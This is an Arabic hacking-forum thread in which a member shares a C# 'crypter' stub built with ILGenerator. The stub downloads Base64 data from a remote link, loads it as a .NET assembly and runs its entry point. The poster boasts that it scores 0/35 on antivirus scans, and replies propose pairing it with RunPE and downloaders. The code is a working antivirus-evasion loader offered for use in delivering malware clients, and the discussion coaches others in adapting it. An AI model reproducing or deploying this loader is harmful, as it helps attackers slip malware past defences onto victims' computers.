0/35 بمناسبة نهاية السنة التشفير كلين باستعمال الـ ILGenerator

تم تحميل الصفحة في 0,5321791 ثانية
0/35 بمناسبة نهاية السنة التشفير كلين باستعمال الـ ILGenerator

Mr.LOAI

~أستغفر الله العظيم~
rankrankrankrankrank
إنضم
28 يونيو 2016
المشاركات
2,045
الإعجابات
2,116
النقاط
163
الإقامة
BLA

السلام عليكم ورحمة الله وبركاته
بمناسبة نهاية السنة أطرح تشفيرة بسيطة كلين
الأخ نابليون طرح طريقة عمل مسج بوكس فيها بس ما شفت أحد أستعملها بالتشفير


أي سؤال في الكود أنا جاهز
كل ما عليك هو أنك تحط الرابط بقيم ال Base64
تم تخطي النود حتى مع الكلاينت الخام لكن عند الفحص المباشر تم إظهار تحذير لتشفيره لازم تشفر الخام وأعتقد مطروح نسخة من قبل.

والكود فقط إستبدال لـ
كود C#
            Assembly.Load(Convert.FromBase64String("")).EntryPoint.Invoke(null,null);

من الممكن عمل الكثير من التغيرات التي لا تعد
الكود

كود C#
    WebClient wc = new WebClient();
            AssemblyBuilder assemBuilder = AppDomain.CurrentDomain.DefineDynamicAssembly(new AssemblyName("Project"), AssemblyBuilderAccess.Run);
            ModuleBuilder modBuilder = assemBuilder.DefineDynamicModule("Project");
            TypeBuilder tb = modBuilder.DefineType("Class", TypeAttributes.Public);
            MethodBuilder methBuilder = tb.DefineMethod("Main", MethodAttributes.Public, null, null);
            ILGenerator gen = methBuilder.GetILGenerator();
            gen.Emit(OpCodes.Ldstr, wc.DownloadString("Link"));
            gen.Emit(OpCodes.Call, typeof(Convert).GetMethod("FromBase64String", new Type[] { typeof(String) }));
            gen.Emit(OpCodes.Call, typeof(Assembly).GetMethod("Load", new Type[] { typeof(Byte[]) }));
            gen.Emit(OpCodes.Callvirt, typeof(Assembly).GetProperty("EntryPoint").GetGetMethod());
            gen.Emit(OpCodes.Ldnull);
            gen.Emit(OpCodes.Ldnull);
            gen.Emit(OpCodes.Callvirt, typeof(MethodBase).GetMethod("Invoke", new Type[] { typeof(Object), typeof(Object[]) }));
            gen.Emit(OpCodes.Pop);
            gen.Emit(OpCodes.Ret);    
            Type t = tb.CreateType();
            Object o = Activator.CreateInstance(t);
            t.GetMethod("Main").Invoke(o, null);



النتيجة
Results | Metadefender.com
كالعادة بريئ في إستخدامه فيما لا يرضي الله
تحياتي

 

Bashar Bachir

ديـف بـويـنـتـي
إنضم
16 مارس 2011
المشاركات
7,538
الإعجابات
8,570
النقاط
173
الإقامة
Germany
ماشاء الله عليك يالؤي
بالفعل موضوع خرااافي واتحدى انه يوجد باي مكان
تعبت وهلكت ولاكنت اقدر اوصل للي انت حطيته
ماشاء الله عليك اخي الحبيب
وخلص تعلمت من طريقتك الان كيف استخدم ILGenerator جيدا
شكرا لك اخي الحبيب
يثبت لاطول فترة ممكنة
لان بصدق اللي سويته شي قوي كتير ومااحد سواه
وانا عجزت عنه
فوت موضوعي ههه
موضوع السنة - BasharBachirAlgorithm كلين لمدة طويلة جدا 0/61
 
إنضم
18 يوليو 2015
المشاركات
4,863
الإعجابات
8,741
النقاط
133
الإقامة
Republic Of Bahrain
كل عام وانت بخير صديقي لؤوي
استعمال متعدد لـ Emit الافضل استعمالها
في استدعاء مكتبة وتنفيذها كـ مثلا RunPe لان اكثر
طرق الاستدعاء مكشوفة وهذه من الطرق الي تجعله كلين
 

Bashar Bachir

ديـف بـويـنـتـي
إنضم
16 مارس 2011
المشاركات
7,538
الإعجابات
8,570
النقاط
173
الإقامة
Germany
سؤالي هوة اخي الحبيب لؤي دام انك قلت لنا انك مستعد للجواب ههه
كيف عرف الكونفيرت اننا رح نحول القيم اللي جلبناها من الرابط .؟
 

Bashar Bachir

ديـف بـويـنـتـي
إنضم
16 مارس 2011
المشاركات
7,538
الإعجابات
8,570
النقاط
173
الإقامة
Germany
كل عام وانت بخير صديقي لؤوي
استعمال متعدد لـ Emit الافضل استعمالها
في استدعاء مكتبة وتنفيذها كـ مثلا RunPe لان اكثر
طرق الاستدعاء مكشوفة وهذه من الطرق الي تجعله كلين
صعبه يااخي :26:
 

Mr.LOAI

~أستغفر الله العظيم~
rankrankrankrankrank
إنضم
28 يونيو 2016
المشاركات
2,045
الإعجابات
2,116
النقاط
163
الإقامة
BLA
عمو لؤي طرح هدية رأس السنة ,,
يعطيك العافية تلاعب رهيب بال IL

يوشم يا طيب و كل عام و انت بالف خير :38:
منور الموضوع
الله يعافيك
وأنت بخير
 

Mr.LOAI

~أستغفر الله العظيم~
rankrankrankrankrank
إنضم
28 يونيو 2016
المشاركات
2,045
الإعجابات
2,116
النقاط
163
الإقامة
BLA
عمو لؤي طرح هدية رأس السنة ,,
يعطيك العافية تلاعب رهيب بال IL

يوشم يا طيب و كل عام و انت بالف خير
تعبت نفسك لما لونت الخط كنت انسخه مثل ما هو ههههههه
أنرت
 

Mr.LOAI

~أستغفر الله العظيم~
rankrankrankrankrank
إنضم
28 يونيو 2016
المشاركات
2,045
الإعجابات
2,116
النقاط
163
الإقامة
BLA
كل عام وانت بخير صديقي لؤوي
استعمال متعدد لـ Emit الافضل استعمالها
في استدعاء مكتبة وتنفيذها كـ مثلا RunPe لان اكثر
طرق الاستدعاء مكشوفة وهذه من الطرق الي تجعله كلين
منور الموضوع
وأنت بألف خير
فكرة حلوة كمان يب
 

Mr.LOAI

~أستغفر الله العظيم~
rankrankrankrankrank
إنضم
28 يونيو 2016
المشاركات
2,045
الإعجابات
2,116
النقاط
163
الإقامة
BLA
ماشاء الله عليك يالؤي
بالفعل موضوع خرااافي واتحدى انه يوجد باي مكان
تعبت وهلكت ولاكنت اقدر اوصل للي انت حطيته
ماشاء الله عليك اخي الحبيب
وخلص تعلمت من طريقتك الان كيف استخدم ILGenerator جيدا
شكرا لك اخي الحبيب
يثبت لاطول فترة ممكنة
لان بصدق اللي سويته شي قوي كتير ومااحد سواه
وانا عجزت عنه
فوت موضوعي ههه
موضوع السنة - BasharBachirAlgorithm كلين لمدة طويلة جدا 0/61
منور الموضوع مستر بشار
العفو
هههههه بس اخلص الرد بفوت عليه
سؤالي هوة اخي الحبيب لؤي دام انك قلت لنا انك مستعد للجواب ههه
كيف عرف الكونفيرت اننا رح نحول القيم اللي جلبناها من الرابط .؟
الباراميتر هو السطر السابق للكونفيرت
ما عرفت إذا عرفت أشرح هههه أو يمكن تقدر توضح أكثر
 

Bashar Bachir

ديـف بـويـنـتـي
إنضم
16 مارس 2011
المشاركات
7,538
الإعجابات
8,570
النقاط
173
الإقامة
Germany
منور الموضوع مستر بشار
العفو
هههههه بس اخلص الرد بفوت عليه

الباراميتر هو السطر السابق للكونفيرت
ما عرفت إذا عرفت أشرح هههه أو يمكن تقدر توضح أكثر
اهلا مستر لؤي ههه
طيب يعني اللي فهمته منك انو لازم اعرف قبل بسطر القيم دائما
مثلا لو كان عندي بايت اراي واريد اشغلها باللود
بحط القيم فوق قبل اللود مباشرة
وعشان typof ليش مااستخدمت Type.GetType
احسن لسا بالنتيجة بدل ميكون 0 من 35
بصير -5 من 35 :15:
تبا لك حظك حلو مافيني افتح الفيجوال هلق كنت هلكتك اسئلة
يلا لبكرا لاتخاف والله رح اسالك :15::10:
 

Mr.LOAI

~أستغفر الله العظيم~
rankrankrankrankrank
إنضم
28 يونيو 2016
المشاركات
2,045
الإعجابات
2,116
النقاط
163
الإقامة
BLA
اهلا مستر لؤي ههه
طيب يعني اللي فهمته منك انو لازم اعرف قبل بسطر القيم دائما
مثلا لو كان عندي بايت اراي واريد اشغلها باللود
بحط القيم فوق قبل اللود مباشرة
وعشان typof ليش مااستخدمت Type.GetType
احسن لسا بالنتيجة بدل ميكون 0 من 35
بصير -5 من 35 :15:
تبا لك حظك حلو مافيني افتح الفيجوال هلق كنت هلكتك اسئلة
يلا لبكرا لاتخاف والله رح اسالك :15::10:
يب قبل بسطر دائما صح
بالنسبة للبايت أراي هي قصة ثانية عشان هيك حطيت الBase64 لانها String
ما استخدمت الـ typeof حبيت أخلي الكود بسيط
ممكن بمواضيع ثانية أشوه الكود كامل هههه
غدا نلتقي من جديد هههههه
 

Bashar Bachir

ديـف بـويـنـتـي
إنضم
16 مارس 2011
المشاركات
7,538
الإعجابات
8,570
النقاط
173
الإقامة
Germany
يب قبل بسطر دائما صح
بالنسبة للبايت أراي هي قصة ثانية عشان هيك حطيت الBase64 لانها String
ما استخدمت الـ typeof حبيت أخلي الكود بسيط
ممكن بمواضيع ثانية أشوه الكود كامل هههه
غدا نلتقي من جديد هههههه
بدنا القصة الثانية :30::30::30::30::30::30::30:
 

Mr.LOAI

~أستغفر الله العظيم~
rankrankrankrankrank
إنضم
28 يونيو 2016
المشاركات
2,045
الإعجابات
2,116
النقاط
163
الإقامة
BLA
شرح سريع عشان نعسان هههه
لما عملنا لود للسترينج أستخدمنا Ldstr
بس مافي شي جاهز حسب ما أعرف عشان نعمل لود لل Byte Array
عشان هيك ممكن نحط متغير ونحفظ القيم فيه حبه حبه
أو طرق ثانية بدي أجربهم قريبا
 
إنضم
19 مايو 2016
المشاركات
1,342
الإعجابات
1,360
النقاط
243
العمر
38
الله ينور عليك
أخي الغالي لؤي
تشفيرة قوية جدا
وان شاء الله استفيد منها شخصيا
لأتم تخطي لـ 0/35
بدفاعاتها الاستباقية
مشكور
*****************
 

h!dd3nSniper

.:: UCC¤Hack¤Division ::.
rankrankrankrank
إنضم
14 مارس 2013
المشاركات
1,248
الإعجابات
1,462
النقاط
113
الإقامة
¤I.S¤
تعامل جميل مع مكتبة الريفلكشن ودالة Emit
ينمّ على خبرة برمجية,
الله يزيدك علما
لمن يفهم طريقة ilGenerator يمكن اللعب كما يريد
كاضافة ايفنت لعمل الدونلودر مثلا
 

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 0 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل